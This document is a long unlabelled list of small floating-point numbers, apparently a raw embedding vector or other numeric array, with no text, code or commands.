-0.033234428614377975, -0.006007762625813484, -0.00270786602050066, -0.0017172243678942323, -0.0034748143516480923, 0.0047429702244699, -0.00437967898324132, -0.007312920410186052, 0.06065619736909866, 0.003730463795363903, -0.02163601852953434, -0.025686044245958328, -0.001387571101076901, -0.023210279643535614, -0.022927720099687576, -0.019671553745865822, -0.0005676427390426397, 0.013253406621515751, -0.008200965821743011, -0.01940244808793068, -0.018487492576241493, 0.029520785436034203, 0.004877522587776184, -0.022254958748817444, 0.02774469368159771, -0.0030997497960925102, -0.001435505342669785, -0.00341762974858284, 0.029036397114396095, 0.03377263993024826, 0.013636880554258823, -0.009452302940189838, 0.006091857794672251, -0.024838363751769066, -0.0005382093950174749, -0.010246161371469498, -0.00374391907826066, 0.003639640985056758, 0.01190115511417389, -0.014679661020636559, -0.03571019321680069, 0.022524062544107437, 0.008396066725254059, 0.002721321303397417, 0.0032561668194830418, -0.0059270309284329414, 0.025161288678646088, 0.010750732384622097, -0.014572019688785076, -0.03234638646245003, -0.012271174229681492, 0.006323960609734058, -0.0056175608187913895, 0.012708469294011593, 0.00042846513679251075, -0.004958254285156727, -0.01879696361720562, 0.035844746977090836, 0.021851301193237305, 0.023156458511948586, -0.0020906070712953806, 0.017074692994356155, -0.0038582885172218084, 0.010057788342237473, -0.00452432269230485, 0.012089529074728489, 0.0048136101104319096, -0.03786303102970123, 0.012244263663887978, -0.007043815683573484, 0.015944452956318855, 0.021568741649389267, 0.016778677701950073, -0.012499913573265076, -0.00947248563170433, -0.0025985422544181347, -0.017747454345226288, -0.008954458869993687, -0.011201483197510242, -0.028309814631938934, 0.015271691605448723, 0.020196307450532913, 0.009990512393414974, 0.026022424921393394, -0.009311022236943245, 0.0117464205250144, -0.05199102684855461, -0.012150077149271965, -0.015338967554271221, 0.008295152336359024, -0.020034844055771828, 0.012775745242834091, -0.00220834044739604, -0.007104364223778248, 0.008927548304200172, -0.007534931413829327, -0.018326029181480408, -0.024838363751769066, 0.0005276974989101291, -0.006260048132389784, -0.00343613070435822, -0.0035252715460956097, 0.007985682226717472, 0.03199654817581177, -0.013206313364207745, -0.02128618210554123, 0.013912713155150414, 0.029547695070505142, 0.004167758859694004, -0.000027304666218697093, -0.003595911432057619, -0.00498180091381073, -0.0004700922581832856, -0.020196307450532913, -0.0007883926737122238, -0.018918059766292572, -0.012002069503068924, -0.007111091632395983, 0.011867517605423927, 0.027300672605633736, 0.007360013667494059, -0.008422977291047573, -0.00797895435243845, 0.0028255993966013193, 0.012210626155138016, -0.01636156626045704, -0.0054930998012423515, 0.010178885422647, -0.0012042435118928552, -0.011739692650735378, 0.01786855235695839, 0.006576246116310358, 0.008248059079051018, 0.0018854148220270872, -0.007131274323910475, 0.018030015751719475, 0.012930480763316154, -0.016953596845269203, -0.012728651985526085, -0.017962738871574402, -0.03902018070220947, -0.0011596730910241604, -0.0033537172712385654, 0.0025312660727649927, 0.00034331873757764697, 0.004527686629444361, 0.002559858374297619, 0.0016264015575870872, -0.003972657956182957, -0.027045022696256638, -0.04491357505321503, -0.005153355188667774, -0.012331723235547543, 0.012230808846652508, -0.01937553845345974, -0.013287044130265713, 0.0027684145607054234, 0.008355701342225075, -0.0009048645733855665, -0.0012832930078729987, -0.005291271023452282, 0.006350870709866285, -0.0050827148370444775, -0.01190115511417389, 0.008766085840761662, -0.015823356807231903, 0.013327410444617271, 0.031296875327825546, -0.005832844413816929, -0.0021578832529485226, -0.019617732614278793, -0.015002586878836155, -0.01019234023988247, -0.008900637738406658, -0.012896842323243618, -0.006081765983253717, -0.022806623950600624, -0.006283594761043787, 0.02844436652958393, -0.006152406334877014, 0.019886836409568787, -0.017908917739987373, 0.018514404073357582, -0.0020721061155200005, 0.014302914962172508, -0.016294289380311966, -0.001939235720783472, 0.011638778261840343, -0.012271174229681492, 0.02887493371963501, 0.02238951064646244, 0.013549421913921833, -0.0005091965431347489, -0.008389338850975037, 0.012486457824707031, -0.0024841728154569864, -0.03377263993024826, 0.01992720365524292, 0.0075080213136971, 0.009876142255961895, -0.004601690452545881, -0.017505260184407234, -0.004013023804873228, -0.01862204447388649, -0.02339865267276764, 0.010636363178491592, -0.010320165194571018, 0.007676211651414633, -0.0028003707993775606, 0.01161186769604683, -0.0001997261424548924, -0.01957736723124981, 0.00392556469887495, 0.005385458003729582, 0.013589787296950817, 0.012156805023550987, 0.0004877522587776184, 0.021730205044150352, -0.009203380905091763, 0.011288941837847233, 0.00169956439640373, -0.007925133220851421, 0.018514404073357582, 0.01952354609966278, 0.006956356577575207, -0.0021730205044150352, -0.0050658960826694965, -0.014625840820372105, -0.005708383396267891, 0.013219768181443214, 0.015863722190260887, 0.0031367517076432705, -0.013926167972385883, -0.018918059766292572, 0.009882870130240917, 0.013710884377360344, -0.009055373258888721, 0.00855752918869257, -0.012849749065935612, 0.013778160326182842, -0.014006899669766426, -0.024407796561717987, -0.0063575985841453075, -0.0013085216050967574, -0.01226444635540247, -0.023075727745890617, -0.008153872564435005, 0.004699240904301405, 0.019913747906684875, -0.005479644518345594, -0.014370190910995007, 0.014437466859817505, 0.012002069503068924, 0.011786785908043385, -0.004137484822422266, 0.005916939582675695, -0.004827065393328667, 0.02090943604707718, 0.00488761393353343, -0.01161186769604683, 0.014074175618588924, 0.007279281970113516, 0.007945315912365913, 0.007111091632395983, -0.016146281734108925, -0.0000558182000531815, -0.02253751829266548, 0.007925133220851421, -0.0074945660308003426, 0.0019695099908858538, 0.007723304908722639, -0.002684319391846657, -0.006024581380188465, -0.0004360337043181062, -0.00890736561268568, 0.0038280142471194267, 0.010562359355390072, 0.021905122324824333, 0.008449887856841087, -0.0004257320542819798, -0.006128859706223011, 0.009620493277907372, -0.009990512393414974, 0.0035690010990947485, -0.0005621765158139169, -0.00847007054835558, 0.007844401523470879, -0.0029029669240117073, 0.011719509959220886, 0.022577883675694466, -0.014854579232633114, 0.006936173420399427, -0.0053652748465538025, -0.0073465583845973015, 0.011625323444604874, 0.01139658410102129, 0.0020098756067454815, -0.012298084795475006, 0.008476798422634602, 0.0003414265811443329, -0.0007753579411655664, -0.020842159166932106, 0.00144980160985142, 0.009358115494251251, -0.02962842769920826, -0.008954458869993687, -0.0037573743611574173, 0.011060203425586224, -0.0037506467197090387, -0.013616697862744331, 0.010380714200437069, -0.019510090351104736, 0.009358115494251251, 0.011060203425586224, -0.014302914962172508, -0.026600999757647514, -0.030920129269361496, 0.012513368390500546, 0.03716335818171501, -0.0037506467197090387, 0.003629549639299512, -0.004695876967161894, -0.02930550090968609, -0.016442297026515007, -0.023452473804354668, 0.005059168208390474, 0.027583232149481773, -0.017128514125943184, 0.0015784671995788813, -0.0000705348647898063, -0.011531135998666286, -0.006263412069529295, 0.012486457824707031, 0.03490287810564041, 0.011255304329097271, 0.006206227000802755, -0.021972399204969406, 0.0025464033242315054, 0.007043815683573484, -0.0018585043726488948, 0.01726306602358818, 0.011383128352463245, -0.01254027895629406, 0.011625323444604874, 0.03710953891277313, -0.0074138343334198, -0.042303260415792465, -0.000994005473330617, -0.005372002720832825, -0.03229256346821785, 0.003989477176219225, -0.0002775142202153802, 0.003163662040606141, 0.011517681181430817, -0.012298084795475006, 0.019160253927111626, -0.004890977870672941, 0.01310539897531271, 0.014693116769194603, 0.012937208637595177, -0.005607469007372856, -0.011093840934336185, 0.01628083363175392, -0.00374391907826066, -0.003301578341051936, 0.0007808241061866283, -0.006149042397737503, -0.019092978909611702, -0.02485181950032711, 0.0009342978592030704, 0.0023159822449088097, -0.017155423760414124, 0.015917543321847916, 0.008046230301260948, 0.0008392703020945191, 0.0023260738234966993, 0.0063374158926308155, -0.013912713155150414, 0.020115576684474945, -0.0006933650583960116, 0.01311885379254818, 0.007070725783705711, -0.03344971314072609, 0.019442815333604813, 0.002576677594333887, 0.014881489798426628, 0.010293254628777504, 0.00470596831291914, 0.019267896190285683, 0.009237018413841724, -0.0007879721815697849, -0.0011100568808615208, -0.004662238992750645, -0.0002239035238744691, 0.009358115494251251, 0.0021965671330690384, 0.015863722190260887, -0.007528204005211592, -0.00023441541998181492, -0.008510435931384563, -0.010871829465031624, 0.006243228912353516, -0.01688631996512413, -0.0032729858066886663, 0.0018585043726488948, -0.014935310930013657, -0.006068311166018248, -0.004409953486174345, 0.0036497325636446476, -0.012062618508934975, -0.023465929552912712, -0.010508538223803043, -0.01731688715517521, -0.0033251249697059393, -0.008947730995714664, 0.015527341514825821, -0.01766672357916832, 0.014989132061600685, -0.0019846472423523664, 0.005718474742025137, -0.0005058327224105597, 0.005223995074629784, -0.02960151620209217, 0.008947730995714664, 0.004890977870672941, -0.011632050387561321, 0.02065378613770008, 0.0034294030629098415, -0.01877005212008953, 0.00870553683489561, 0.008671899326145649, -0.005264360457658768, 0.0007349922088906169, 0.006599792744964361, -0.01025288924574852, -0.022349145263433456, -0.009378299117088318, 0.007447472773492336, -0.0035824563819915056, -0.006983267143368721, 0.010501811280846596, -0.008026047609746456, 0.015527341514825821, 0.015217870473861694, -0.010885285213589668, 0.019846471026539803, -0.0030997497960925102, -0.030597204342484474, 0.016119372099637985, 0.0005461984546855092, -0.01424909383058548, 0.013038123026490211, 0.03309987857937813, -0.02696429006755352, -0.022752802819013596, -0.014531653374433517, -0.005546920467168093, 0.028202172368764877, 0.011934793554246426, 0.025551490485668182, -0.0009595264564268291, -0.000024886929168133065, -0.023681214079260826, 0.0026389078702777624, -0.007582024671137333, -0.020021390169858932, -0.01025288924574852, 0.05731930211186409, 0.013421596959233284, -0.002299163257703185, -0.00556037575006485, 0.008806451223790646, 0.009055373258888721, 0.007292737253010273, 0.018891150131821632, -0.01089201308786869, 0.016092460602521896, -0.004245126619935036, -0.006350870709866285, -0.0066300672478973866, -0.0031821629963815212, 0.009580126963555813, -0.01761290244758129, 0.01013851910829544, 0.00029202064615674317, 0.006495514884591103, 0.008665171451866627, -0.006643522065132856, -0.0024118509609252214, -0.0023109365720301867, 0.029466964304447174, 0.01441055629402399, 0.011504225432872772, 0.008766085840761662, -0.011336035095155239, -0.012769018299877644, -0.014652750454843044, -0.008449887856841087, -0.0000994951551547274, 0.019967569038271904, -0.028632739558815956, 0.002650681184604764, -0.014639295637607574, 0.0009822321590036154, -0.021151630207896233, -0.009808866307139397, -0.015096773393452168, 0.0050759874284267426, 0.015944452956318855, -0.022833533585071564, 0.0007930179126560688, 0.017505260184407234, 0.011719509959220886, -0.006212954875081778, 0.00003839472265099175, 0.0018315938068553805, -0.018285663798451424, 0.001694518607109785, -0.022147316485643387, -0.008160600438714027, 0.004931343719363213, 0.0015927634667605162, -0.018608590587973595, -0.033907193690538406, 0.008517163805663586, -0.008322062902152538, 0.0015523977344855666, 0.003811195259913802, -0.038912538439035416, 0.005294634960591793, 0.013044849969446659, 0.010764188133180141, 0.009075555950403214, 0.012244263663887978, -0.005620924290269613, 0.004396498203277588, -0.01714196987450123, -0.02030394971370697, 0.007003449834883213, -0.03183508664369583, 0.014316369779407978, 0.005395549349486828, 0.004174486733973026, -0.007682939060032368, 0.029493875801563263, 0.01743798516690731, -0.0050726234912872314, -0.002136018592864275, 0.00035109755117446184, 0.0013640244724228978, -0.016697946935892105, -0.005153355188667774, -0.006391236558556557, 0.00035067705903202295, 0.00777712557464838, -0.005392185412347317, 0.00527108833193779, -0.012782473117113113, 0.006815076339989901, -0.015500430949032307, -0.019429359585046768, -0.02530929632484913, -0.005664654076099396, -0.003363808849826455, -0.01937553845345974, -0.018635500222444534, 0.027637053281068802, -0.0006092698313295841, -0.0060952212661504745, 0.012015525251626968, 0.010495083406567574, 0.02015594206750393, -0.009136104956269264, -0.008597895503044128, 0.007400379050523043, -0.007952043786644936, -0.01590408757328987, -0.0026557270903140306, 0.0011798558989539742, 0.016213558614253998, -0.0027482316363602877, 0.03423011675477028, 0.003029109677299857, 0.004652147646993399, -0.02849818766117096, -0.01920062117278576, -0.00672761769965291, 0.0024353975895792246, 0.00477997213602066, 0.036221493035554886, -0.023761944845318794, -0.0039188372902572155, -0.016697946935892105, -0.027408313006162643, 0.012237535789608955, -0.0011546273017302155, 0.005291271023452282, -0.00556037575006485, -0.010865102522075176, 0.0192275308072567, 0.011874244548380375, 0.014424012042582035, -0.005324909463524818, -0.01517750509083271, -0.016401931643486023, -0.022779712453484535, -0.003484905930235982, 0.02018285170197487, 0.0015809901524335146, 0.005385458003729582, -0.00960031058639288, -0.0012151759583503008, -0.007931861095130444, -0.0038481971714645624, 0.009943418204784393, -0.005432551261037588, -0.009956873953342438, 0.008779540657997131, 0.0013404777273535728, -0.004487320780754089, 0.02427324466407299, 0.014545109122991562, 0.010609452612698078, 0.017424529418349266, 0.0010856692679226398, 0.01726306602358818, 0.021124718710780144, -0.0025665860157459974, -0.006767983082681894, 0.005735293962061405, 0.020357770845294, 0.0019644643180072308, 0.016926685348153114, -0.008496981114149094, 0.0010268025798723102, -0.01613282598555088, 0.006438329815864563, 0.004759789444506168, 0.02844436652958393, 0.004194669425487518, -0.0008905683644115925, 0.01359651517122984, 0.004420044831931591, -0.014773847535252571, -0.011988614685833454, -0.013078488409519196, 0.0079184053465724, -0.0005558693665079772, 0.02557840198278427, 0.0063475072383880615, -0.0025329480413347483, -0.0017676814459264278, -0.003484905930235982, -0.004544505383819342, 0.006323960609734058, -0.007730032317340374, -0.029924442991614342, -0.019281351938843727, 0.009855959564447403, 0.02053268812596798, 0.013112126849591732, -0.032830774784088135, 0.004056753125041723, 0.013717612251639366, -0.019429359585046768, -0.013071760535240173, -0.010966016910970211, -0.011739692650735378, -0.007750215474516153, -0.009223563596606255, -0.022349145263433456, 0.00016629829769954085, 0.013616697862744331, -0.0017777729080989957, 0.013778160326182842, -0.006969811860471964, 0.008429705165326595, 0.010737277567386627, 0.01374452281743288, -0.0022285233717411757, -0.005149991251528263, -0.018716230988502502, 0.009896324947476387, -0.030112816020846367, -0.0016684491420164704, 0.03998895734548569, -0.03912782296538353, -0.008530618622899055, -0.017653267830610275, 0.009062101133167744, 0.010239433497190475, 0.021017076447606087, -0.009586854837834835, -0.005607469007372856, -0.017007416114211082, -0.004867431242018938, -0.008772812783718109, -0.023452473804354668, -0.009512851014733315, 0.004362859763205051, -0.017935827374458313, -0.005590650252997875, 0.0021662928629666567, -0.007360013667494059, -0.010521993972361088, 0.0056579262018203735, -0.0035151802003383636, -0.0035690010990947485, 0.013778160326182842, -0.018124202266335487, -0.020895980298519135, -0.0035790924448519945, -0.00834224559366703, -0.00040155465831048787, -0.004060117062181234, 0.007528204005211592, 0.007871312089264393, -0.008772812783718109, -0.019496634602546692, 0.009028462693095207, 0.004964981693774462, 0.012170259840786457, -0.013926167972385883, -0.001900551957078278, 0.007810764014720917, -0.004285492468625307, -0.015971364453434944, -0.010118336416780949, -0.012964119203388691, -0.010178885422647, -0.0006731822504661977, -0.0078040361404418945, -0.01439710147678852, -0.01653648354113102, 0.008248059079051018, -0.015527341514825821, -0.004147576168179512, 0.005950577557086945, 0.03234638646245003, -0.025174744427204132, -0.008725719526410103, 0.006128859706223011, 0.015137139707803726, -0.012721925042569637, -0.00268936506472528, -0.01914680004119873, -0.00932447798550129, -0.005361910909414291, 0.012708469294011593, 0.008126961998641491, -0.013038123026490211, -0.012318267486989498, -0.010367258451879025, -0.009142831899225712, -0.03640986606478691, -0.005398912820965052, -0.013280317187309265, 0.008510435931384563, -0.0043359496630728245, -0.01026634406298399, 0.004642055835574865, 0.015325512737035751, -0.004130756948143244, -0.002060332801192999, -0.004921252373605967, 0.013125581666827202, 0.0027482316363602877, -0.004504140000790358, -0.0005899279494769871, -0.013805070891976357, 0.024179058149456978, -0.0011697644367814064, -0.002102380385622382, 0.01519095990806818, 0.0023630757350474596, -0.024434706196188927, 0.008806451223790646, -0.0026288165245205164, -0.019133344292640686, -0.02082870341837406, -0.024286698549985886, -0.012156805023550987, -0.0062095909379422665, 0.0063643259927630424, 0.00634414330124855, -0.029144039377570152, 0.011692599393427372, 0.003010608721524477, -0.005479644518345594, -0.009593582712113857, -0.010663273744285107, 0.01383198145776987, -0.006408055778592825, -0.01723615638911724, 0.0007757783751003444, -0.015110229142010212, 0.01844712719321251, 0.006747800391167402, 0.02033085934817791, -0.024111781269311905, 0.012089529074728489, 0.022470243275165558, -0.0021612471900880337, 0.0009561626357026398, -0.008813179098069668, 0.02701811119914055, -0.0020771517883986235, -0.015460064634680748, -0.00870553683489561, 0.010791098698973656, 0.02351975068449974, 0.026197342202067375, 0.016227012500166893, 0.0075080213136971, 0.007225461304187775, 0.011490770615637302, 0.007723304908722639, -0.014585474506020546, 0.01423563901335001, -0.002635544165968895, 0.00120003882329911, -0.006579610053449869, -0.01819147728383541, 0.00594385014846921, 0.03875107690691948, -0.0021629289258271456, -0.017599446699023247, -0.00403320649638772, -0.015137139707803726, 0.02226841449737549, 0.023062271997332573, 0.017074692994356155, 0.0018938243156298995, 0.005563739687204361, 0.018326029181480408, 0.0027633688878268003, 0.0150160426273942, 0.0012412454234436154, -0.009001552127301693, -0.01439710147678852, -0.013966534286737442, -0.010945833288133144, 0.012244263663887978, -0.008550802245736122, -0.017276521772146225, 0.00759547995403409, -0.011383128352463245, -0.002339528873562813, 0.0005382093950174749, 0.025672588497400284, -0.026331894099712372, -0.010844919830560684, -0.008611350320279598, 0.0013127264101058245, -0.0076560284942388535, 0.010602724738419056, -0.029789891093969345, 0.003505088621750474, -0.0178416408598423, 0.00017954329086933285, 0.023102639243006706, 0.0029366051312536, -0.0038044676184654236, -0.0001505304389866069, -0.02774469368159771, -0.009970328770577908, -0.012022252194583416, 0.01902570202946663, -0.02643953636288643, 0.010676728561520576, -0.02201276458799839, -0.010952561162412167, -0.006196135655045509, 0.010569087229669094, -0.014154907315969467, -0.003269622102379799, -0.009916508570313454, -0.039692942053079605, 0.0035656371619552374, -0.009721407666802406, -0.01749180629849434, 0.008261513896286488, 0.00819423794746399, -0.011874244548380375, 0.002050241455435753, 0.0031838449649512768, -0.008490253239870071, 0.013603242114186287, 0.013993443921208382, 0.010158702731132507, -0.004504140000790358, -0.006969811860471964, -0.013690701685845852, 0.001290861633606255, -0.007460927590727806, -0.013152492232620716, -0.000014624683899455704, 0.0023731670808047056, -0.011349490843713284, 0.002622088883072138, 0.04090391471982002, 0.012769018299877644, 0.019066067412495613, -0.012055890634655952, 0.0035925477277487516, -0.006579610053449869, -0.010421079583466053, -0.0019745556637644768, -0.011369673535227776, 0.008322062902152538, -0.004591599106788635, 0.0010360530577600002, 0.003121614456176758, 0.01099292654544115, -0.024407796561717987, 0.004870795179158449, 0.017276521772146225, -0.00623313756659627, -0.01899879239499569, -0.003710281103849411, 0.011336035095155239, -0.004790063481777906, -0.017787819728255272, -0.002405123319476843, -0.015581161715090275, 0.01650957390666008, 0.008840089663863182, 0.011053475551307201, -0.022779712453484535, 0.01003760565072298, -0.0035656371619552374, -0.002405123319476843, 0.010643091052770615, 0.007252371869981289, -0.0032006639521569014, -0.0028811022639274597, -0.012533551082015038, 0.014343280345201492, -0.0049178884364664555, -0.004332585725933313, 0.003723736386746168, -0.010858374647796154, 0.0033772638998925686, 0.006744436454027891, 0.011934793554246426, 0.002290753647685051, -0.011463860049843788, -0.013569604605436325, -0.009566672146320343, 0.007360013667494059, -0.019066067412495613, 0.009876142255961895, -0.0042013972997665405, -0.009432119317352772, -0.01636156626045704, 0.01914680004119873, 0.04747007042169571, 0.0075214761309325695, -0.011053475551307201, 0.010071243159472942, 0.0019089614506810904, 0.019765740260481834, 0.00623313756659627, 0.01929480768740177, 0.014302914962172508, 0.0038818353787064552, 0.0001269837812287733, -0.005264360457658768, -0.00790495052933693, -0.00304424692876637, -0.012102983891963959, -0.010562359355390072, 0.009950146079063416, 0.00608849385753274, 0.006969811860471964, 0.028955666348338127, 0.00777712557464838, -0.005274452269077301, -0.009728134609758854, -0.010643091052770615, -0.021138174459338188, -0.002697774674743414, 0.00527108833193779, -0.004013023804873228, -0.0017130195628851652, -0.013791616074740887, 0.028336724266409874, 0.008133689872920513, -0.004107210319489241, 0.0013514101738110185, -0.015271691605448723, -0.010394169017672539, 0.0017659995937719941, 0.009015007875859737, 0.007393651641905308, 0.00324439350515604, -0.0032225288450717926, -0.013058305718004704, 0.006061583291739225, 0.01980610564351082, 0.0025985422544181347, 0.012203898280858994, -0.010656545870006084, 0.015486975200474262, 0.005052440799772739, -0.0026136795058846474, -0.0031518887262791395, 0.0011647187639027834, -0.010737277567386627, -0.01877005212008953, 0.0038145591970533133, -0.0012160168262198567, 0.008678626269102097, 0.016253923997282982, 0.004517595283687115, -0.0027902794536203146, 0.001061281654983759, 0.016617214307188988, 0.03466068580746651, 0.00694290129467845, 0.0020081938710063696, -0.00789149571210146, 0.01326686143875122, 0.018500948324799538, -0.005005347542464733, 0.020573053508996964, -0.013139036484062672, 0.002659090794622898, 0.011706054210662842, -0.010824736207723618, -0.03689425438642502, 0.0016390158561989665, 0.007837674580514431, 0.002847464056685567, 0.015312056988477707, -0.010683456435799599, 0.009250474162399769, -0.010750732384622097, 0.019833017140626907, 0.010151974856853485, -0.015123683959245682, 0.002438761293888092, 0.010387441143393517, -0.004039934370666742, -0.013724339194595814, 0.0138858025893569, -0.017330342903733253, 0.019765740260481834, -0.0038952904287725687, 0.006996721960604191, -0.015365878120064735, 0.012378816492855549, 0.03729791194200516, -0.016146281734108925, -0.014383645728230476, -0.027004657313227654, 0.006845350842922926, -0.009707951918244362, 0.0014455968048423529, 0.013038123026490211, -0.004507503937929869, 0.004806882701814175, 0.009667586535215378, 0.00892082042992115, -0.013818526640534401, -0.001075577805750072, 0.021124718710780144, 0.0004919570055790246, -0.013024667277932167, 0.0004017649043817073, 0.0009881188161671162, -0.019617732614278793, 0.009741590358316898, -0.007420562207698822, 0.007299465127289295, -0.0043460410088300705, -0.00007437171007040888, -0.0040836636908352375, -0.023237191140651703, -0.011490770615637302, -0.022658616304397583, 0.0013606606516987085, -0.004901069216430187, -0.0076493010856211185, 0.001781136728823185, 0.007857857272028923, -0.008348973467946053, -0.005291271023452282, 0.009062101133167744, 0.00026679207803681493, 0.015971364453434944, 0.01075746025890112, -0.017882008105516434, -0.005180265288800001, 0.01902570202946663, 0.0016432205447927117, 0.012459547258913517, 0.013710884377360344, -0.024663446471095085, -0.0065123336389660835, -0.03595238924026489, 0.009755045175552368, -0.011376401409506798, -0.009674313478171825, -0.020761428400874138, 0.0010587588185444474, -0.011134207248687744, 0.014356736093759537, 0.019886836409568787, -0.020519234240055084, 0.009593582712113857, 0.0025262203998863697, -0.012748834677040577, -0.016469206660985947, -0.007205278147011995, 0.00927065685391426, 0.006572882179170847, 0.00394574785605073, -0.03186199814081192, -0.006263412069529295, -0.0045108674094080925, 0.0015902406303212047, 0.011026564985513687, -0.00947248563170433, 0.01911988854408264, -0.014302914962172508, 0.008422977291047573, 0.002428669948130846, -0.027879247441887856, -0.022900810465216637, 0.003797739977017045, -0.012082801200449467, 0.01183387916535139, -0.0020468775182962418, 0.00616249768063426, 0.0007038769545033574, 0.006381145212799311, 0.010912195779383183, -0.00712454691529274, 0.0026910470332950354, -0.0133812315762043, 0.0014405511319637299, 0.018124202266335487, -0.004137484822422266, 0.011652233079075813, -0.024596169590950012, -0.02178402617573738, 0.0069294460117816925, 0.004171122796833515, 0.013071760535240173, 0.01559461746364832, 0.006354234647005796, 0.0002995892136823386, -0.037405554205179214, 0.0056175608187913895, 0.005573831032961607, -0.00389865436591208, -0.0037910123355686665, -0.0028626013081520796, -0.01055563148111105, -0.00206369673833251, 0.009459029883146286, 0.026668274775147438, -0.010299982503056526, 0.006239865440875292, -0.0006273503531701863, -0.018352940678596497, -0.006552699487656355, -0.03606003150343895, 0.023075727745890617, 0.0005827798740938306, -0.0192275308072567, -0.012150077149271965, -0.008624806068837643, -0.00748783815652132, -0.025793684646487236, -0.0013186130672693253, -0.025497669354081154, -0.00530809024348855, -0.01992720365524292, 0.01598481833934784, -0.011255304329097271, -0.0010192340705543756, 0.021191995590925217, 0.0033772638998925686, 0.03842815011739731, 0.006515697576105595, -0.010320165194571018, 0.015056408010423183, -0.006889080163091421, 0.012782473117113113, -0.01844712719321251, 0.01731688715517521, 0.014854579232633114, -0.023909952491521835, -0.002731412649154663, 0.014383645728230476, 0.0079184053465724, 0.017760910093784332, -0.007111091632395983, -0.0016331291990354657, -0.0000407336228818167, 0.010199068114161491, 0.002943332539871335, 0.014720027334988117, 0.00884681660681963, -0.005267724394798279, 0.002127608982846141, 0.008692082017660141, -0.011208211071789265, 0.022954631596803665, 0.0016104234382510185, 0.0010553949978202581, 0.001041939714923501, 0.0026288165245205164, 0.003986113239079714, -0.005267724394798279, 0.015621528029441833, 0.020438501611351967, -0.006186044309288263, 0.022510608658194542, -0.0024084870237857103, -0.013522511348128319, -0.002576677594333887, -0.012298084795475006, -0.012668103910982609, 0.014760392718017101, -0.009829048998653889, 0.012587372213602066, 0.005762204527854919, 0.011739692650735378, 0.004275401122868061, -0.010912195779383183, 0.013858892023563385, 0.0005945531884208322, 0.01013851910829544, -0.027462134137749672, -0.010844919830560684, -0.018151111900806427, -0.006260048132389784, -0.013515783473849297, -0.0058732102625072, -0.011679143644869328, -0.011228393763303757, 0.007117819506675005, -0.014706571586430073, -0.0039390199817717075, 0.014074175618588924, 0.00645178509876132, 0.005049076862633228, -0.008887182921171188, -0.00847007054835558, -0.0043763150461018085, -0.015850266441702843, 0.011450405232608318, 0.009358115494251251, 0.021043987944722176, 0.0005651198443956673, -0.010131792165338993, -0.003461359301581979, 0.003412584075704217, -0.012224080972373486, -0.013872346840798855, 0.013004484586417675, -0.00796549953520298, 0.004581507295370102, -0.0044805933721363544, 0.014276004396378994, -0.00459832651540637, 0.004753061570227146, -0.00623313756659627, 0.007999137043952942, -0.0001591502077644691, 0.014276004396378994, 0.018662411719560623, 0.020869068801403046, -0.012728651985526085, -0.01270174141973257, 0.03143142908811569, 0.015338967554271221, -0.0020317404996603727, 0.040473345667123795, -0.00990305282175541, -0.008564257062971592, -0.011780058033764362, 0.004013023804873228, -0.013219768181443214, 0.024811454117298126, 0.001176492078229785, 0.00884681660681963, -0.010185613296926022, -0.00043645419646054506, 0.012896842323243618, 0.004874158650636673, -0.01062963530421257, -0.035871654748916626, 0.03231947496533394, -0.0020889253355562687, -0.009519578889012337, 0.016267379745841026, -0.001675176783464849, 0.002648999448865652, 0.005301362369209528, -0.004497412126511335, 0.006845350842922926, 0.0021242452785372734, 0.020223218947649002, -0.005587286315858364, 0.01439710147678852, 0.019160253927111626, 0.022402966395020485, 0.00826824177056551, 0.0007148093427531421, 0.009909780696034431, -0.009095738641917706, -0.0073465583845973015, -0.006360962521284819, -0.003192254574969411, 0.00748783815652132, 0.019214075058698654, 0.006098585203289986, 0.01175987534224987, -0.0045007760636508465, -0.009465757757425308, -0.0019947385881096125, -0.0017256338614970446, -0.019335173070430756, 0.02490564063191414, 0.0019594186451286077, 0.012291356921195984, 0.0007980636437423527, 0.011706054210662842, -0.021972399204969406, -0.017020871862769127, -0.0013287044130265713, 0.01937553845345974, 0.02273934707045555, 0.013926167972385883, 0.005005347542464733, 0.014800758101046085, -0.0008956140954978764, 0.014585474506020546, -0.011423494666814804, 0.012250991538167, 0.003441176377236843, 0.02997826412320137, 0.0010940787615254521, 0.03186199814081192, -0.0006786484154872596, -0.0028087804093956947, 0.013199585489928722, 0.004144212231040001, -0.01555425114929676, 0.011665688827633858, 0.000011070346772612538, -0.026883559301495552, -0.0042114886455237865, -0.00004824963252758607, 0.01539278868585825, 0.008369156159460545, 0.00007736760016996413, -0.00687226140871644, -0.010912195779383183, -0.0009082283359020948, 0.01055563148111105, -0.00818078313022852, -0.00013024246436543763, -0.015486975200474262, 0.022698981687426567, 0.009855959564447403, -0.025497669354081154, 0.025914782658219337, 0.00218983949162066, 0.014787303283810616, -0.006603156682103872, 0.00036308111157268286, 0.0028205537237226963, 0.02296808548271656, -0.014572019688785076, -0.005456097889691591, 0.018326029181480408, 0.032857682555913925, 0.0008539869450032711, -0.012809383682906628, -0.0037809209898114204, 0.0028626013081520796, -0.013630152679979801, 0.021245816722512245, 0.0020048299338668585, -0.009297567419707775, -0.00394574785605073, -0.020599965006113052, -0.004722787532955408, 0.010683456435799599, -0.01159841287881136, 0.001637333887629211, -0.014558563940227032, -0.01741107366979122, -0.0034983609803020954, -0.010575815103948116, -0.018500948324799538, 0.0018315938068553805, 0.01241245400160551, 0.012567189522087574, -0.0031653440091758966, 0.0030644298531115055, -0.003868380095809698, -0.0013278635451570153, 0.011450405232608318, -0.020492322742938995, 0.0023782127536833286, -0.0002253751881653443, -0.041199930012226105, 0.011114023625850677, -0.014693116769194603, 0.009290839545428753, 0.010387441143393517, 0.016401931643486023, -0.010434534400701523, 0.019940657541155815, -0.01801656000316143, -0.018756598234176636, -0.0002884466084651649, -0.0034394944086670876, 0.02329101227223873, 0.008274969644844532, -0.011208211071789265, 0.015110229142010212, -0.0015675348695367575, -0.008429705165326595, -0.021622562780976295, -0.011241848580539227, 0.013737794943153858, 0.008867000229656696, 0.013966534286737442, -0.0028188717551529408, -0.0026759097818285227, -0.03490287810564041, -0.010730549693107605, 0.0042114886455237865, -0.008752630092203617, -0.0024993098340928555, 0.009566672146320343, 0.021555285900831223, 0.005338364280760288, -0.00356227345764637, 0.005856391042470932, 0.000040181745134759694, 0.00477997213602066, -0.016953596845269203, -0.0023731670808047056, 0.018904605880379677, 0.01255373377352953, -0.0014195273397490382, -0.01706123724579811, -0.013939623720943928, -0.018326029181480408, 0.013549421913921833, 0.0024538985453546047, 0.014868034981191158, -0.021972399204969406, -0.005684836767613888, -0.0015919224824756384, -0.011134207248687744, 0.019133344292640686, -0.004050025716423988, 0.003135069739073515, 0.012358632870018482, -0.007945315912365913, -0.008308607153594494, -0.00010816747817443684, 